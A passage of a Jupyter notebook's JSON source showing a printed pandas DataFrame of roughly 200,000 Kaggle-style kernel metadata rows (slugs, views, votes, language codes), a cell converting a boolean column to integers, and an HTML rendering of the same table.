"... ... ... ... \n",
"201951 project-euler-21 NaN 18 \n",
"201952 ny-stock-price-prediction-rnn-lstm-gru-eb2000 NaN 37 \n",
"201953 starter-banknote-f2165545-1 NaN 0 \n",
"201954 lightgbm-automated-feature-engineering-easy NaN 57 \n",
"201955 a3-demo-decision-trees NaN 29 \n",
"201956 starter-twitter-worlds2018-0cb7d034-3 NaN 3 \n",
"201957 starter-twitter-worlds2018 NaN 39 \n",
"201958 tutorial-linear-regression NaN 22 \n",
"201959 mks-proteins NaN 208 \n",
"201960 exploration-of-f1-dataset-1102f3-aaf5b9 NaN 41 \n",
"201961 fraud-detection NaN 17 \n",
"201962 google-customer-revenue-prediction NaN 239 \n",
"201963 diabeticretinopathyvgg16-finetuning NaN 144 \n",
"201964 protein-atlas-exploration-and-baseline NaN 17 \n",
"201965 01-iris-species NaN 36 \n",
"201966 chicago-crime-investigation NaN 71 \n",
"201967 cnn-128x128x4-keras-from-scratch-lb-0-328 2.0 1808 \n",
"201968 transforma-o-de-vari-veis NaN 117 \n",
"201969 apply-t-sne-on-news 3.0 907 \n",
"201970 redu-o-de-dimensionalidade NaN 43 \n",
"201971 clusteriza-o NaN 33 \n",
"201972 starter-twitter-data-4e7ab639-b NaN 2 \n",
"201973 how-to-score-0-0255-0-0245-top-10-score NaN 552 \n",
"201974 house-price-xgboost NaN 11 \n",
"201975 starter-twitter-sentiment-analysis-f08e9d52-d NaN 4 \n",
"201976 mnist-with-fastai-style NaN 6 \n",
"201977 a-begining-try NaN 31 \n",
"201978 getting-started-in-r-first-steps-337898 NaN 4 \n",
"201979 my-first-data-science-homework NaN 70 \n",
"201980 u-s-democrat-and-republican-tweet-exploration NaN 82 \n",
"\n",
" TotalComments TotalVotes LanguageName \n",
"0 0 0 1 \n",
"1 1 12 1 \n",
"2 0 0 1 \n",
"3 0 0 1 \n",
"4 0 0 1 \n",
"5 0 0 1 \n",
"6 0 0 1 \n",
"7 0 0 1 \n",
"8 0 0 1 \n",
"9 0 0 1 \n",
"10 2 6 1 \n",
"11 8 36 1 \n",
"12 0 0 1 \n",
"13 5 8 1 \n",
"14 0 0 1 \n",
"15 23 91 1 \n",
"16 0 0 1 \n",
"17 0 0 1 \n",
"18 0 4 1 \n",
"19 0 0 1 \n",
"20 0 0 1 \n",
"21 1 0 1 \n",
"22 0 1 1 \n",
"23 0 0 1 \n",
"24 0 0 1 \n",
"25 0 0 1 \n",
"26 0 0 1 \n",
"27 0 0 1 \n",
"28 0 0 1 \n",
"29 0 0 1 \n",
"... ... ... ... \n",
"201951 0 1 2 \n",
"201952 0 0 2 \n",
"201953 0 0 2 \n",
"201954 0 1 2 \n",
"201955 0 0 2 \n",
"201956 0 0 2 \n",
"201957 0 1 2 \n",
"201958 0 0 2 \n",
"201959 0 0 1 \n",
"201960 0 0 2 \n",
"201961 0 0 2 \n",
"201962 3 3 2 \n",
"201963 0 1 2 \n",
"201964 0 0 2 \n",
"201965 0 1 2 \n",
"201966 0 0 2 \n",
"201967 15 36 2 \n",
"201968 0 13 2 \n",
"201969 7 15 2 \n",
"201970 0 1 2 \n",
"201971 0 1 2 \n",
"201972 0 0 2 \n",
"201973 2 10 2 \n",
"201974 0 0 2 \n",
"201975 0 0 2 \n",
"201976 0 0 2 \n",
"201977 0 0 2 \n",
"201978 0 0 1 \n",
"201979 0 2 2 \n",
"201980 2 4 1 \n",
"\n",
"[201981 rows x 13 columns]"
]
},
"execution_count": 19,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"#change the IsProjectLanguageTemplate to numeric datatype\n",
"df.IsProjectLanguageTemplate[df.IsProjectLanguageTemplate==False]=int(0)\n",
"df.IsProjectLanguageTemplate[df.IsProjectLanguageTemplate==True]=int(1)\n",
"\n",
"df\n"
]
},
{
"cell_type": "code",
"execution_count": 21,
"metadata": {},
"outputs": [
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>1.0</td>\n",
" <td>0.0</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
" <td>0.0</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>9.0</td>\n",
" <td>0.0</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>13.0</td>\n",
" <td>0.0</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>15.0</td>\n",
" <td>0.0</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>5</th>\n",
" <td>7</td>\n",
" <td>3716</td>\n",
" <td>48.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>27.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding</td>\n",
" <td>NaN</td>\n",
" <td>13</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>6</th>\n",
" <td>9</td>\n",
" <td>3716</td>\n",
" <td>50.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>49.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding-with-new-script</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>7</th>\n",
" <td>11</td>\n",
" <td>3716</td>\n",
" <td>373.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>54.0</td>\n",
" <td>0.0</td>\n",
" <td>as-raster</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>8</th>\n",
" <td>12</td>\n",
" <td>993</td>\n",
" <td>6467.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>55.0</td>\n",
" <td>0.0</td>\n",
" <td>whoops-doing-this-logged-in-under-my-own-name</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>9</th>\n",
" <td>13</td>\n",
" <td>993</td>\n",
" <td>6468.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>73.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-packages</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>10</th>\n",
" <td>14</td>\n",
" <td>993</td>\n",
" <td>269065.0</td>\n",
" <td>NaN</td>\n",
" <td>14925.0</td>\n",
" <td>77.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-r-packages</td>\n",
" <td>NaN</td>\n",
" <td>7921</td>\n",
" <td>2</td>\n",
" <td>6</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>11</th>\n",
" <td>15</td>\n",
" <td>993</td>\n",
" <td>520.0</td>\n",
" <td>NaN</td>\n",
" <td>20068.0</td>\n",
" <td>140.0</td>\n",
" <td>0.0</td>\n",
" <td>example-handwritten-digits</td>\n",
" <td>3.0</td>\n",
" <td>29080</td>\n",
" <td>8</td>\n",
" <td>36</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>12</th>\n",
" <td>16</td>\n",
" <td>993</td>\n",
" <td>154.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>141.0</td>\n",
" <td>0.0</td>\n",
" <td>mean-digits</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>13</th>\n",
" <td>17</td>\n",
" <td>993</td>\n",
" <td>649.0</td>\n",
" <td>NaN</td>\n",
" <td>18337.0</td>\n",
" <td>155.0</td>\n",
" <td>0.0</td>\n",
" <td>pixel-mean-and-variances-by-digit</td>\n",
" <td>NaN</td>\n",
" <td>9989</td>\n",
" <td>5</td>\n",
" <td>8</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>14</th>\n",
" <td>20</td>\n",
" <td>993</td>\n",
" <td>803.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>171.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-tree-4</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>15</th>\n",
" <td>21</td>\n",
" <td>993</td>\n",
" <td>1227.0</td>\n",
" <td>NaN</td>\n",
" <td>17462.0</td>\n",
" <td>185.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-1</td>\n",
" <td>2.0</td>\n",
" <td>52294</td>\n",
" <td>23</td>\n",
" <td>91</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>16</th>\n",
" <td>22</td>\n",
" <td>206545</td>\n",
" <td>190.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>188.0</td>\n",
" <td>0.0</td>\n",
" <td>dougg-test</td>\n",
" <td>NaN</td>\n",
" <td>164</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>17</th>\n",
" <td>23</td>\n",
" <td>114978</td>\n",
" <td>193.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>191.0</td>\n",
" <td>0.0</td>\n",
" <td>some-basic-stats</td>\n",
" <td>NaN</td>\n",
" <td>230</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>18</th>\n",
" <td>24</td>\n",
" <td>114978</td>\n",
" <td>308.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>194.0</td>\n",
" <td>0.0</td>\n",
" <td>rotate-all-the-features</td>\n",
" <td>NaN</td>\n",
" <td>2491</td>\n",
" <td>0</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>19</th>\n",
" <td>25</td>\n",
" <td>993</td>\n",
" <td>213.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>209.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>20</th>\n",
" <td>26</td>\n",
" <td>993</td>\n",
" <td>212.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>212.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands-1</td>\n",
" <td>NaN</td>\n",
" <td>84</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>21</th>\n",
" <td>27</td>\n",
" <td>993</td>\n",
" <td>294.0</td>\n",
" <td>NaN</td>\n",
" <td>35477.0</td>\n",
" <td>214.0</td>\n",
" <td>0.0</td>\n",
" <td>we-have-imagemagick-installed</td>\n",
" <td>NaN</td>\n",
" <td>685</td>\n",
" <td>1</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>22</th>\n",
" <td>29</td>\n",
" <td>114978</td>\n",
" <td>238.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>216.0</td>\n",
" <td>0.0</td>\n",
" <td>randombananaclassifier</td>\n",
" <td>NaN</td>\n",
" <td>766</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>23</th>\n",
" <td>30</td>\n",
" <td>9679</td>\n",
" <td>236.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>236.0</td>\n",
" <td>0.0</td>\n",
" <td>mytest</td>\n",
" <td>NaN</td>\n",
" <td>124</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>24</th>\n",
" <td>31</td>\n",
" <td>185835</td>\n",
" <td>261.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>239.0</td>\n",
" <td>0.0</td>\n",
" <td>peek-data</td>\n",
" <td>NaN</td>\n",
" <td>1064</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>25</th>\n",
" <td>32</td>\n",
" <td>19605</td>\n",
" <td>244.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>244.0</td>\n",
" <td>0.0</td>\n",
" <td>example-r</td>\n",
" <td>NaN</td>\n",
" <td>337</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>26</th>\n",
" <td>33</td>\n",
" <td>319768</td>\n",
" <td>253.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>253.0</td>\n",
" <td>0.0</td>\n",
" <td>testo</td>\n",
" <td>NaN</td>\n",
" <td>58</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>27</th>\n",
" <td>34</td>\n",
" <td>28963</td>\n",
" <td>19064.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>262.0</td>\n",
" <td>0.0</td>\n",
" <td>python</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>28</th>\n",
" <td>35</td>\n",
" <td>320040</td>\n",
" <td>264.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>263.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer</td>\n",
" <td>NaN</td>\n",
" <td>142</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>29</th>\n",
" <td>39</td>\n",
" <td>319893</td>\n",
" <td>552.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>321.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer-using-knn</td>\n",
" <td>NaN</td>\n",
" <td>717</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>...</th>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201951</th>\n",
" <td>1875333</td>\n",
" <td>442623</td>\n",
" <td>6498125.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6495275.0</td>\n",
" <td>0.0</td>\n",
" <td>project-euler-21</td>\n",
" <td>NaN</td>\n",
" <td>18</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201952</th>\n",
" <td>1875398</td>\n",
" <td>1497793</td>\n",
" <td>6497141.0</td>\n",
" <td>2395222.0</td>\n",
" <td>0.0</td>\n",
" <td>6497049.0</td>\n",
" <td>0.0</td>\n",
" <td>ny-stock-price-prediction-rnn-lstm-gru-eb2000</td>\n",
" <td>NaN</td>\n",
" <td>37</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201953</th>\n",
" <td>1875414</td>\n",
" <td>2080166</td>\n",
" <td>6494175.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6494175.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-banknote-f2165545-1</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201954</th>\n",
" <td>1875417</td>\n",
" <td>1776773</td>\n",
" <td>6499806.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6498408.0</td>\n",
" <td>0.0</td>\n",
" <td>lightgbm-automated-feature-engineering-easy</td>\n",
" <td>NaN</td>\n",
" <td>57</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201955</th>\n",
" <td>1915910</td>\n",
" <td>498422</td>\n",
" <td>6657552.0</td>\n",
" <td>6528403.0</td>\n",
" <td>0.0</td>\n",
" <td>6655666.0</td>\n",
" <td>0.0</td>\n",
" <td>a3-demo-decision-trees</td>\n",
" <td>NaN</td>\n",
" <td>29</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201956</th>\n",
" <td>1915916</td>\n",
" <td>2080166</td>\n",
" <td>6655493.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6655493.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018-0cb7d034-3</td>\n",
" <td>NaN</td>\n",
" <td>3</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201957</th>\n",
" <td>1915988</td>\n",
" <td>1660833</td>\n",
" <td>6656526.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6655878.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018</td>\n",
" <td>NaN</td>\n",
" <td>39</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201958</th>\n",
" <td>1916035</td>\n",
" <td>1179427</td>\n",
" <td>6661990.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6661990.0</td>\n",
" <td>0.0</td>\n",
" <td>tutorial-linear-regression</td>\n",
" <td>NaN</td>\n",
" <td>22</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201959</th>\n",
" <td>1916052</td>\n",
" <td>1828058</td>\n",
" <td>6730922.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6656151.0</td>\n",
" <td>0.0</td>\n",
" <td>mks-proteins</td>\n",
" <td>NaN</td>\n",
" <td>208</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201960</th>\n",
" <td>1916057</td>\n",
" <td>1601569</td>\n",
" <td>6730437.0</td>\n",
" <td>6633328.0</td>\n",
" <td>0.0</td>\n",
" <td>6668207.0</td>\n",
" <td>0.0</td>\n",
" <td>exploration-of-f1-dataset-1102f3-aaf5b9</td>\n",
" <td>NaN</td>\n",
" <td>41</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201961</th>\n",
" <td>1916068</td>\n",
" <td>1267737</td>\n",
" <td>6656222.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6656222.0</td>\n",
" <td>0.0</td>\n",
" <td>fraud-detection</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201962</th>\n",
" <td>1916091</td>\n",
" <td>756325</td>\n",
" <td>6656455.0</td>\n",
" <td>NaN</td>\n",
" <td>69117.0</td>\n",
" <td>6656455.0</td>\n",
" <td>0.0</td>\n",
" <td>google-customer-revenue-prediction</td>\n",
" <td>NaN</td>\n",
" <td>239</td>\n",
" <td>3</td>\n",
" <td>3</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201963</th>\n",
" <td>1916101</td>\n",
" <td>1090244</td>\n",
" <td>6690675.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6656399.0</td>\n",
" <td>0.0</td>\n",
" <td>diabeticretinopathyvgg16-finetuning</td>\n",
" <td>NaN</td>\n",
" <td>144</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201964</th>\n",
" <td>1916124</td>\n",
" <td>1170777</td>\n",
" <td>6805081.0</td>\n",
" <td>6632919.0</td>\n",
" <td>0.0</td>\n",
" <td>6805081.0</td>\n",
" <td>0.0</td>\n",
" <td>protein-atlas-exploration-and-baseline</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201965</th>\n",
" <td>1916181</td>\n",
" <td>2386017</td>\n",
" <td>6660035.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6659703.0</td>\n",
" <td>0.0</td>\n",
" <td>01-iris-species</td>\n",
" <td>NaN</td>\n",
" <td>36</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201966</th>\n",
" <td>1916199</td>\n",
" <td>2108937</td>\n",
" <td>6938214.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657733.0</td>\n",
" <td>0.0</td>\n",
" <td>chicago-crime-investigation</td>\n",
" <td>NaN</td>\n",
" <td>71</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201967</th>\n",
" <td>1916215</td>\n",
" <td>637434</td>\n",
" <td>6904698.0</td>\n",
" <td>6600035.0</td>\n",
" <td>69362.0</td>\n",
" <td>6657640.0</td>\n",
" <td>0.0</td>\n",
" <td>cnn-128x128x4-keras-from-scratch-lb-0-328</td>\n",
" <td>2.0</td>\n",
" <td>1808</td>\n",
" <td>15</td>\n",
" <td>36</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201968</th>\n",
" <td>1916243</td>\n",
" <td>885589</td>\n",
" <td>6895750.0</td>\n",
" <td>6601958.0</td>\n",
" <td>0.0</td>\n",
" <td>6656920.0</td>\n",
" <td>0.0</td>\n",
" <td>transforma-o-de-vari-veis</td>\n",
" <td>NaN</td>\n",
" <td>117</td>\n",
" <td>0</td>\n",
" <td>13</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201969</th>\n",
" <td>1916268</td>\n",
" <td>1113072</td>\n",
" <td>6941531.0</td>\n",
" <td>NaN</td>\n",
" <td>69337.0</td>\n",
" <td>6658725.0</td>\n",
" <td>0.0</td>\n",
" <td>apply-t-sne-on-news</td>\n",
" <td>3.0</td>\n",
" <td>907</td>\n",
" <td>7</td>\n",
" <td>15</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201970</th>\n",
" <td>1916283</td>\n",
" <td>885589</td>\n",
" <td>6684908.0</td>\n",
" <td>6601958.0</td>\n",
" <td>0.0</td>\n",
" <td>6657006.0</td>\n",
" <td>0.0</td>\n",
" <td>redu-o-de-dimensionalidade</td>\n",
" <td>NaN</td>\n",
" <td>43</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201971</th>\n",
" <td>1916285</td>\n",
" <td>885589</td>\n",
" <td>6681010.0</td>\n",
" <td>6601958.0</td>\n",
" <td>0.0</td>\n",
" <td>6657012.0</td>\n",
" <td>0.0</td>\n",
" <td>clusteriza-o</td>\n",
" <td>NaN</td>\n",
" <td>33</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201972</th>\n",
" <td>1916310</td>\n",
" <td>2080166</td>\n",
" <td>6657002.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657002.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-data-4e7ab639-b</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201973</th>\n",
" <td>1916350</td>\n",
" <td>2092403</td>\n",
" <td>6671885.0</td>\n",
" <td>NaN</td>\n",
" <td>69316.0</td>\n",
" <td>6659016.0</td>\n",
" <td>0.0</td>\n",
" <td>how-to-score-0-0255-0-0245-top-10-score</td>\n",
" <td>NaN</td>\n",
" <td>552</td>\n",
" <td>2</td>\n",
" <td>10</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201974</th>\n",
" <td>1916366</td>\n",
" <td>2225268</td>\n",
" <td>6670628.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657409.0</td>\n",
" <td>0.0</td>\n",
" <td>house-price-xgboost</td>\n",
" <td>NaN</td>\n",
" <td>11</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201975</th>\n",
" <td>1916461</td>\n",
" <td>2080166</td>\n",
" <td>6657685.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657685.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-sentiment-analysis-f08e9d52-d</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201976</th>\n",
" <td>1916539</td>\n",
" <td>1162757</td>\n",
" <td>6659497.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6659320.0</td>\n",
" <td>0.0</td>\n",
" <td>mnist-with-fastai-style</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201977</th>\n",
" <td>1916566</td>\n",
" <td>1270421</td>\n",
" <td>6658657.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6658657.0</td>\n",
" <td>0.0</td>\n",
" <td>a-begining-try</td>\n",
" <td>NaN</td>\n",
" <td>31</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201978</th>\n",
" <td>1916572</td>\n",
" <td>2373215</td>\n",
" <td>6658820.0</td>\n",
" <td>1847749.0</td>\n",
" <td>0.0</td>\n",
" <td>6658820.0</td>\n",
" <td>0.0</td>\n",
" <td>getting-started-in-r-first-steps-337898</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201979</th>\n",
" <td>1916595</td>\n",
